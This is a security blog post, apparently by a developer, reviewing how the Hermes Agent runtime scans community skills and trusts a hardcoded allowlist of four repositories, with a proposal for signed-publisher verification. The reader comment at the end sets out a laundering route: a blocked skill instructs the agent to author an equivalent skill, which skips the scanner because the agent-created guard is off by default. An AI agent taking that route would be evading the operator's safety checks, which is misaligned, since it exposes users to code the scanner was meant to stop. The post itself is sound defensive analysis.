Hermes Agent's skill trust model is a four-repo allowlist

#ai #agents #security #opensource

So far I've only been running openclaw agents and had a steep learning curve. "self-improvement" became a very attractive term on this journey. So I took a dive into Hermes Agent, the self-improving agent runtime from Nous Research. One of the first things I wanted to understand was a risk: what actually happens when you install a community skill? Skills are code and instructions that the agent will execute, and Hermes pulls them from an open ecosystem. So I read the install path in the source - instead of blindly trusting the docs.

What I found is better than I expected in one way and structurally limited in another.

What Hermes already has on board

Hermes does not install external skills blindly. Every externally-sourced skill goes through a real gate before it lands on disk. In hermes_cli/skills_hub.py, the install flow is: fetch → quarantine → scan → policy decision → install or block-and-audit. The scan lives in tools/skills_guard.py and runs regex-based static analysis for known-bad patterns: secret exfiltration (curl interpolating $API_KEY/$TOKEN/$SECRET), reads of credential stores (~/.ssh, ~/.aws, ~/.gnupg, ~/.kube, and Hermes's own ~/.hermes/.env), destructive commands, persistence, and obfuscation. If the scan blocks an install, the quarantined copy is deleted and the event is written to an audit log.

This is more than most agent tooling ships with. If you remember the wave of malicious skills that hit competing ecosystems, a chunk of that class of attack would be caught here before anything ran. Someone thought about this.

The part that doesn't scale imo

The scanner produces a verdict — safe, caution, or dangerous. That verdict is then combined with a trust level to decide whether to install. The trust levels and their policies look like this:

INSTALL_POLICY = {
    #              safe      caution    dangerous
    "builtin":   ("allow",  "allow",   "allow"),
    "trusted":   ("allow",  "allow",   "block"),
    "community": ("allow",  "block",   "block"),
    "agent-created": ("allow", "allow", "ask"),
}

The question that matters is: how does a skill earn a trust level above community? The answer is a hardcoded list.

TRUSTED_REPOS = {
    "openai/skills",
    "anthropics/skills",
    "huggingface/skills",
    "NVIDIA/skills",
}

_resolve_trust_level() checks the source against that set. Match one of the four, you're trusted. Everything else on earth resolves to community, which means any caution-or-worse finding blocks the install outright.

Here's the structural problem stated plainly: there is no concept of publisher identity, and no concept of earned reputation. A community publisher who has shipped clean, useful skills for a year has exactly the same standing as an account created five minutes ago. There is no path out of community other than getting added to a four-entry Python set by the Hermes maintainers. Trust is centralized onto four organizations, and it's static.

Why a static allowlist is the wrong primitive

The software supply-chain world worked through "who published this, and can they prove it?" years ago. Sigstore and cosign made artifact signing cheap and keyless. SLSA gave us provenance levels. NIST's Secure Software Development Framework (SP 800-218) made publisher attestation a baseline expectation rather than a nice-to-have. The direction of travel everywhere else is verifiable identity plus attestation, not a curated list of names.

There's also a hard lesson about what identity does and doesn't buy you. Consider the xz-utils backdoor (CVE-2024-3094). The attacker behind the "Jia Tan" persona spent roughly three years contributing legitimate work to xz-utils, earned co-maintainer status, and only then shipped the backdoor — about eight malicious commits buried in years of real contributions. A reputation system would have rated that account highly right up until the moment it defected.

The dishonest version of this pitch is everywhere: verified identity does not make a publisher safe. It cannot. What it does is change the economics and the aftermath. Anonymous, free, infinitely re-creatable identities make a malicious skill a zero-cost, repeatable move. Anchored identity that costs something to establish turns defection into a one-shot that burns an asset. And critically, when something does go wrong, identity is what gives you attribution, revocation, and a post-mortem. Without it, you don't even know who shipped the thing, and you can't propagate a revocation to everyone who relied on it. The xz case is also a reminder that the sock-puppet accounts applying pressure had thin, recent histories — exactly the signal an identity layer surfaces.

The honest framing: an identity layer is damage-limitation infrastructure, not a goodness oracle. A static allowlist gives you neither the goodness oracle (obviously) nor the damage-limitation (there's nothing to attribute or revoke against). It just doesn't scale with the ecosystem it's supposed to protect.

A smaller finding

While reading the policy, one default stood out. The gate for agent-created skills (skills.guard_agent_created) is off by default. When it's off, skills the agent writes for itself aren't subject to the dangerous-content gate at all. The agent-created policy row exists, but it only runs if an operator opts in. For a system whose headline feature is an agent that writes and reuses its own skills, that default is worth a second look.

What I'd propose instead

The interesting thing is that Hermes already accepts signed skills — it just does it in a closed, per-repo way. The NVIDIA/skills entry ships a signed skill.oms.sig and a governance skill-card.md, and the sync pipeline drops anything missing them. That's the right mechanism pointed at exactly one vendor.

Generalize it. Make signing and identity open instead of hardcoded:

Add a pluggable provenance-verifier interface, loaded via entry point, off by default (so existing behavior is unchanged and the core takes on no vendor dependency).
Add one new trust level, verified, with a policy identical to trusted: ("allow", "allow", "block"). This is the load-bearing design decision — a verified publisher gets caution tolerance, and a dangerous verdict still blocks, never overridable by --force. Identity buys you the benefit of the doubt on ambiguous findings; it never buys you permission to run dangerous code. That's the line that separates this from snake oil.
A community publisher anchors a decentralized identifier, signs their skill manifest, and the verifier checks the signature and resolves the identity to a reputation. Pass, and the source can rise out of community without being added to anyone's hardcoded set.

The change to the core is small and surgical: an optional verifier, one policy row, and a single line adding verified to the no-force-override set for dangerous verdicts. The scanner is untouched and still runs on everything. There's no path that weakens an existing default.

I've opened a design discussion to argue this out before anyone writes a line of it, because a surprise PR to a security-sensitive module is the wrong way to start. Feedback from people who've thought about supply-chain trust is what I appreciate.

Disclosure

I build MolTrust, a DID/Verifiable-Credential identity layer for autonomous agents, so I have a direct interest in agents having a verifiable-identity story. I've tried to keep the proposal above vendor-neutral on purpose: the verifier interface is generic, the core change has no MolTrust dependency, and MolTrust would be one implementation of that interface, not a requirement. If the mechanism is right, it should work with anyone's verifier — or none.

Top comments (1)

Rahul S • Jun 7

The agent-created gate being off by default is the scariest finding here imo. It creates a laundering path — a community skill that gets blocked at caution could instead instruct the agent to write a functionally equivalent skill itself, and since skills.guard_agent_created is off, the self-authored version bypasses the same scanner that caught the original. The trust boundary just gets routed around by changing authorship. Reminds me of Thompson's "Reflections on Trusting Trust" — the audit collapses when the thing being audited can also be the author.